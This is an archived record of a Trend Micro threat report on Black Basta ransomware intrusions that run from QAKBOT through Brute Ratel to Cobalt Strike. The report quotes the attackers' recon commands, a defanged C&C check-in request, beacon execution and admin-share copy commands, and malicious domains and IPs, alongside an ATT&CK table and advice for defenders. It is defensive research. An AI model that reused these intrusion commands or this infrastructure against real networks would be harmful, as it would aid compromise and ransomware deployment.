{
	"id": "920ef4b4-47d2-4b09-b0ca-dd7f9fb89e9f",
	"created_at": "2026-04-06T02:12:06.762927Z",
	"updated_at": "2026-04-10T03:24:24.157801Z",
	"deleted_at": null,
	"sha1_hash": "743814c804450067041e2596ceeffcb16d3158c2",
	"title": "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 76722,
	"plain_text": "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT,\r\nBrute Ratel, and Cobalt Strike\r\nBy Ian Kenefick, Lucas Silva, Nicole Hernandez ( words)\r\nPublished: 2022-10-12 · Archived: 2026-04-06 01:37:02 UTC\r\nThe rise of Brute Ratel and other C\u0026C frameworks\r\nBrute Ratel is a commercial (paid) Adversary Emulation framework and a relative newcomer to the commercial C\u0026C\r\nFramework space, where it competes with more established players such as Cobalt Strike.\r\nAdversary Emulation frameworks like Brute Ratel and Cobalt Strike are marketed to penetration testing professionals (Red\r\nTeams) for use in legitimate penetration testing activities in which organizations seek to improve their ability to detect and\r\nrespond to real cyberattacks. These frameworks are used to provide hands-on keyboard access from remote locations to\r\nemulate the tactics, techniques, and procedures (TTPs) used by attackers in network intrusions.\r\nOn top of Cobalt Strike’s legitimate use cases, it has gained notoriety for its illicit usage and near omnipresence in high-profile, human-operated ransomware attacks during the past few years. It serves as a common second-stage payload from\r\nBotnets such as QAKBOT (TrojanSpy.Win64.QAKBOT), IcedID (TrojanSpy.Win64.ICEDID), Emotet\r\n(TrojanSpy.Win64.EMOTET), and Bumblebee (Trojan.Win64.BUMBLELOADER), among others. Unfortunately, several\r\nversions of Cobalt Strike have been leaked over the past couple of years, accelerating its malicious use by cybercriminals.\r\nAs a result of its popularity compared to Brute Ratel, its detection coverage is greater than that of the latter. This makes\r\nBrute Ratel and other less established C\u0026C frameworks an increasingly more attractive option for malicious actors, whose\r\nactivities may remain undetected for a longer period.\r\nBrute Ratel has recently attracted greater interest from threat actors in the cybercriminal underground, where versions of the\r\nframework are actively traded and cracked versions circulated. It is unknown how Brute Ratel was initially leaked, but its\r\ndevelopers have acknowledged the leak on Twitter.\r\nQAKBOT ‘BB’ to Brute Ratel\r\nThe campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL\r\nlanding page presents the recipient with a password for a ZIP file.\r\nSandbox and security solution evasion\r\nThe use of password-protected ZIP files at this stage is likely an attempt to evade analysis by security solutions.\r\nMark of the Web evasion\r\nThe ZIP file contains a single .ISO file. The use of an ISO file is an attempt to defeat the “Mark of the Web (MOTW),”\r\nwhich tags files as being downloaded from the internet. It subjects these files to additional security measures by Windows\r\nand endpoint security solutions.\r\nThe ISO file contains a visible LNK file that uses the “Explorer” icon and two hidden subdirectories, each containing\r\nvarious files and directories. By default, on Windows operating systems, hidden files are not displayed to the user. Figure 5\r\nillustrates what the user sees when the “Show hidden files” setting is enabled.\r\nThe directory structure is as follows:\r\nFile Name Description Detection Name SHA-256\r\nAccounting#7405.iso Trojan.Win32.QAKBOT.YACIW 582a5e2b2652284ebb486bf6a367aaa6bb817c856f08ef54db64\r\nContract.lnk LNK File Trojan.LNK.QAKBOT.YACIW e9e214f7338c6baefd2a76ee66f5fadb0b504718ea3cebc65da7a\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 1 of 8\n\nfodder.txt\r\nDecoy text\r\nfile\r\n4dcf06a5afc699bbb73650cefe4ad86a1b686a257c607e0b96dd\r\nenunciatedNaught.cmd\r\nMalicious\r\nCMD File\r\nTrojan.BAT.QAKBOT.YACIW d44b05b248f95986211ab3dc2765f1d76683594a174984c8b80\r\neyelid.png\r\nDecoy PNG\r\nfile\r\ndd755395b36acfceaa0d7e9c5479df4b1c919d57837fe4306898\r\nreflectiveness.db\r\nQAKBOT\r\nDLL\r\nTrojan.Win32.QAKBOT.YACIW 01fd6e0c8393a5f4112ea19a26bedffb31d6a01f4d3fe5721ca20\r\nsharpOutvotes.js\r\nMalicious\r\nJS File\r\nTrojan.JS.QAKBOT.YACIW 06c4c4d100e9a7c79e2ee8c4ffa1f7ad165a014f5f14f90ddfc730\r\nCommand-line interface - Execution sequence\r\nQAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to\r\nconceal suspicious-looking command lines.  \r\nInitial QAKBOT C\u0026C server communication\r\nThe C\u0026C Infrastructure is geographically distributed across compromised hosts residing in predominantly residential\r\nInternet Service Provider (ISP) broadband networks.\r\nThe following countries are where the C\u0026C servers reside:\r\nAfghanistan\r\nAlgeria\r\nArgentina\r\nAustria\r\nBrazil\r\nBulgaria\r\nCanada\r\nChile\r\nColombia\r\nEgypt\r\nIndia\r\nIndonesia\r\nJapan\r\nMexico\r\nMongolia\r\nMorocco\r\nNetherlands\r\nQatar\r\nRussia\r\nSouth Africa\r\nTaiwan\r\nThailand\r\nTurkey\r\nUnited Arab Emirates\r\nUnited Kingdom\r\nUnited States\r\nVietnam\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 2 of 8\n\nYemen\r\nThese ‘Tier 1’ C\u0026C Servers are considered disposable by the QAKBOT operators and are replaced frequently (nearly every\r\ntime there is a new distribution of the malware), though some persist across multiple QAKBOT malware configurations.\r\nAutomated reconnaissance commands\r\nJust six minutes after the initial C\u0026C communication, and with the QAKBOT malware now running inside an injected\r\nprocess (wermgr.exe),  automated reconnaissance in the infected environment is performed via the execution of multiple\r\nbuilt-in command line tools. The execution of these command lines is in the following order:\r\nOrder Process Command Line\r\n1 C:\\Windows\\SysWOW64\\net.exe net view\r\n2 C:\\Windows\\SysWOW64\\ARP.EXE arp -a\r\n3 C:\\Windows\\SysWOW64\\ipconfig.exe ipconfig /all\r\n4 C:\\Windows\\SysWOW64\\nslookup.exe\r\nnslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.\r\n\u003cdomain_fqdn\u003e\r\n5 C:\\Windows\\SysWOW64\\net.exe net share\r\n6 C:\\Windows\\SysWOW64\\ROUTE.EXE route print\r\n7 C:\\Windows\\SysWOW64\\NETSTAT.EXE netstat -nao\r\n8 C:\\Windows\\SysWOW64\\net.exe net localgroup\r\n9 C:\\Windows\\SysWOW64\\whoami.exe whoami /all\r\nThis activity is visible in Trend Micro Vision Oneproducts™, which detects the suspicious usage of these built-in Windows\r\ncommands.\r\nQAKBOT drops Brute Ratel\r\nFive minutes after the automated reconnaissance activities are completed, the QAKBOT-injected wermgr.exe process drops\r\nthe Brute Ratel DLL and invokes it via a rundll32.exe child process with the “main” export function.\r\nThe backdoor is a HTTPS , which performs a check-in with the Brute Ratel Server at symantecuptimehost[.]com:\r\nPOST hxxps://symantecuptimehost[.]com:8080/admin.php?login= HTTP/1.1\r\nContent-Type: application/json\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/90.0.4430.93 Safari/537.36\r\nHost: symantecuptimehost[.]com:8080\r\nContent-Length: 122\r\nCache-Control: no-cache\r\nFurther reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe\r\nare used.\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 3 of 8\n\nOrder Process\r\n1 C:\\Windows\\SysWOW64\\net.exe net group \"Domain Admins\" /domain\r\n2 C:\\Windows\\SysWOW64\\net.exe net group \"Domain Controllers\" /domain\r\n3 C:\\Windows\\SysWOW64\\nltest.exe nltest /domain_trusts /all_trusts\r\n4 C:\\Windows\\SysWOW64\\net.exe net user \u003credacted\u003e /domain\r\nSecond, the SharpHound utility is run via Brute Ratel in an injected svchost.exe process to output JSON files that are\r\ningested into BloodHound (that describes the Active Directory Organisational Units, Group Policies, Domains, User Groups,\r\nComputers, and Users). The files are then packed into a ZIP file in preparation for exfiltration. The entire process is scripted\r\nand takes less than two seconds to complete.\r\nBrute Ratel drops Cobalt Strike\r\nInterestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped\r\nonto the same infected endpoint running Brute Ratel C4, with the first being:\r\nC:\\Users\\Public\\Name-123456.xls\r\nThis beacon file is executed on the same host running the Brute Ratel C4 using the following command:\r\nrundll32 C:\\users\\public\\Name-123456.xls,DllRegisterServer\r\nThe actor drops the other beacon files and copies these to administrative shares on other hosts on the network, again using\r\nfilenames bearing XLS attachments.\r\nC:\\Users\\Public\\abcabc.xls\r\nC:\\Users\\Public\\abc-1234.xls\r\nC:\\Users\\Public\\Orders_12_34_56.xls\r\nC:\\Users\\Public\\MkDir.xls\r\nThe commands used to copy the files are as follows:\r\nC:\\WINDOWS\\system32\\cmd.exe /C copy C:\\users\\public\\fksro.xls\r\n\\\\\u003cHOST\u003e\\C$\\users\\public\\abcabc.xls\r\nThe following list is the beacon C\u0026C Servers:\r\nhxxps://fewifasoc[.]com | 45.153.242[.]251\r\nhxxps://hadujaza[.]com | 45.153.241[.]88\r\nhxxps://himiketiv[.]com | 45.153.241[.]64\r\nThe threat actors were then evicted from the environment before any final actions could be taken. We assess based on the\r\nlevel of access and discovery activity that the likely final actions would have been a domain-wide ransom deployment.\r\nQAKBOT ‘Obama’ to Brute Ratel\r\nIn another, more recent, incident, Trend Micro Research spotted QAKBOT using the “Obama” distributor ID prefix (i.e.\r\n“Obama208”) also dropping Brutel Ratel C4 as a second-stage payload.\r\nIn this case, the malware arrives as a password-protected ZIP file delivered via HTML smuggling, which allows the attacker\r\nto “smuggle” an encoded malicious script into an HTML attachment or web page. Once the user opens the HTML page in\r\nthe browser, the script is decoded and the payload is assembled. \r\nOnce the ZIP file is decrypted using the password provided in the HTML attachment, the user is presented with an ISO file.\r\nThe malicious files are contained in the ISO file, which is used as a Mark of the Web bypass. Inside, an ISO file bears the\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 4 of 8\n\nfollowing directory structure:\r\nSince QAKBOT’s return, we have observed multiple varieties in the execution chain, from scripting languages to file\r\nextensions and the use of export function names and ordinals. For this infection, the following variation was used:\r\nThe infection plays out with the same TTPs (Tactics, Techniques, and Procedures) described in the first kill chain in this\r\nblog. However, one notable difference was observed in the C\u0026C configuration, which used DNS over HTTPS (DoH) vs a\r\nmore traditional HTTPS C\u0026C Channel.  The C\u0026C servers observed used HTTPS with Let’s-Encrypt.\r\nBy using DoH, attackers can hide DNS queries from C\u0026C domains. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C\u0026C server will therefore go unnoticed. \r\nBased on our investigations, we can confirm that the QAKBOT-to-Brute Ratel-to-Cobalt Strike kill chain is associated with\r\nthe group behind the Black Basta Ransomware. This is based on overlapping TTPs and infrastructure observed in Black\r\nBasta attacks. It is not the first time that we have observed intrusions via QAKBOT leading to Black Basta.\r\nConclusion and security recommendations\r\nUsers can thwart new QAKBOT variants and other threats that spread through emails by following some of these\r\nbest practices:\r\nVerify the email sender and content before downloading attachments or selecting embedded links from emails.\r\nHover the pointer above embedded links to show the link’s target.\r\nCheck the sender’s identity. Unfamiliar email addresses, mismatched email and sender names, and spoofed company\r\nemails are some of the signs that the sender has malicious intent.\r\nIf the email claims to come from a legitimate company, verify if they actually sent it before taking any action.\r\nOrganizations should take note of the trending use of Cobalt Strike in attacks, living-off-the-land binaries (LOLBins), and\r\nred team or penetration-testing tools, i.e. Brutel Ratel C4, to blend in with the environment.\r\nUsers can also protect systems through managed detection and response (MDR), which utilizes advanced artificial\r\nintelligence to correlate and prioritize threats, determining if they are part of a larger attack. It can detect threats before they\r\nare executed, thus preventing further compromise.\r\nThe constant resurgence of new, more sophisticated variants of known malware, as well as the emergence of entirely\r\nunknown threats, demand solutions with advanced detection and response capabilities such as Trend Micro Vision\r\nOneproducts, a technology that can provide powerful XDR capabilities that collect and automatically correlate data across\r\nmultiple security layers — from email and endpoints to servers, cloud workloads, and networks. Trend Micro Vision One\r\ncan prevent attacks via automated protection, while also ensuring that no significant incidents go unnoticed.\r\nTactics, Techniques, and Procedures (TTPs)\r\nTactic / Technique Notes\r\nTA0001 Initial Access\r\nT1566.001 Phishing: Spear phishing\r\nAttachment\r\nVictims receive spear phishing emails with attached malicious zip files -\r\ntypically password protected or HTML file. That file contains an ISO\r\nfile.\r\nT1566.001 Phishing: Spear phishing Link QAKBOT has spread through emails with newly created malicious links.\r\nTA0002 Execution\r\nT1204.001 User Execution: Malicious Link QAKBOT has gained execution through users accessing malicious link\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 5 of 8\n\nT1204.002 User Execution: Malicious Link\r\nQAKBOT has gained execution through users opening malicious\r\nattachments\r\nT1569.002 System Services: Service\r\nExecution\r\nCobalt Strike can use PsExec to execute a payload on a remote host. It\r\ncan also use Service Control Manager to start new services\r\nT1059.005 Command and Scripting\r\nInterpreter: Visual Basic Script\r\nQAKBOT can use VBS to download and execute malicious files\r\nT1059.007 Command and Scripting\r\nInterpreter: JavaScript\r\nQAKBOT abuses Wscript to execute a Jscript file.\r\nTA0003 Persistence\r\nT1547.001 Boot or Logon Autostart\r\nExecution: Registry Run Keys / Startup\r\nFolder\r\nQAKBOT can maintain persistence by creating an auto-run Registry key\r\nTA0004 Privilege Escalation\r\nT1055 Process Injection QAKBOT can inject itself into processes like wermgr.exe\r\nTA0006 Defense Evasion\r\nT1027.006 Obfuscated Files or\r\nInformation: HTML Smuggling\r\nSmuggles a file’s content by hiding malicious payloads inside of\r\nseemingly benign HTML files.\r\nT1218.010 System Binary Proxy\r\nExecution: Regsvr32\r\nQAKBOT can use Regsvr32 to execute malicious DLLs\r\nCobalt Strike can use rundll32.exe to load DLL from the command line\r\nT1140. Deobfuscate/Decode Files or\r\nInformation\r\nInitial QAKBOT .zip file bypasses some antivirus detections due to\r\npassword protections.\r\nT1562.009. Impair Defenses: Safe Boot\r\nMode\r\nBlack Basta uses bcdedit to boot the device in safe mode.\r\nTA0007 Discovery\r\nT1010 Application Window Discovery QAKBOT can enumerate windows on a compromised host.\r\nT1482 Domain Trust Discovery\r\nQAKBOT can run nltest /domain_trusts /all_trusts for domain trust\r\ndiscovery.\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 6 of 8\n\nT1135 Network Share Discovery\r\nQAKBOT can use net share to identify network shares for use in lateral\r\nmovement.\r\nT1069.001 Permission Groups Discovery:\r\nLocal Groups\r\nQAKBOT can use net localgroup to enable the discovery of local groups\r\nT1057 Process Discovery QAKBOT has the ability to check running processes\r\nT1018 Remote System Discovery QAKBOT can identify remote systems through the net view command\r\nT1082 System Information Discovery\r\nQAKBOT can collect system information including the OS version and\r\ndomain on a compromised host\r\nT1016 System Network Configuration\r\nDiscovery\r\nQAKBOT can use net config workstation, arp -a, and ipconfig /all to\r\ngather network configuration information\r\nT1049 System Network Connections\r\nDiscovery\r\nQAKBOT can use netstat to enumerate current network connections\r\nT1033 System Owner/User Discovery QAKBOT can identify the username on a compromised system\r\nTA0008 Lateral Movement\r\nT1021 Remote Services: SMB/Windows\r\nAdmin Shares\r\nCobalt Strike can use Window admin shares (C$ and ADMIN$) for\r\nlateral movement\r\nTA0011 Command and Control\r\nT1071.001 Application Layer Protocol:\r\nWeb Protocols\r\nQAKBOT can use HTTP and HTTPS in communication with the C\u0026C\r\nservers.\r\nT1573. Encrypted Channel Used by QAKBOT, BRUTEL and Cobalt Strike\r\nTA0040 Impact\r\nT1486. Data Encrypted for Impact\r\nBlack Basta uses the ChaCha20 algorithm to encrypt files. The\r\nChaCha20 encryption key is then encrypted with a public RSA-4096 key\r\nthat is included in the executable.\r\nT1489. Service Stop Uses sc stop and taskkill to stop services.\r\nT1490. Inhibit System Recovery Black Basta deletes Volume Shadow Copies using vssadmin tool.\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 7 of 8\n\nT1491 - Defacement Replaces the desktop wallpaper to display the ransom note.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nhttps://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
	],
	"report_names": [
		"black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441526,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.pdf",
		"text": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.txt",
		"img": "https://archive.orkl.eu/743814c804450067041e2596ceeffcb16d3158c2.jpg"
	}
}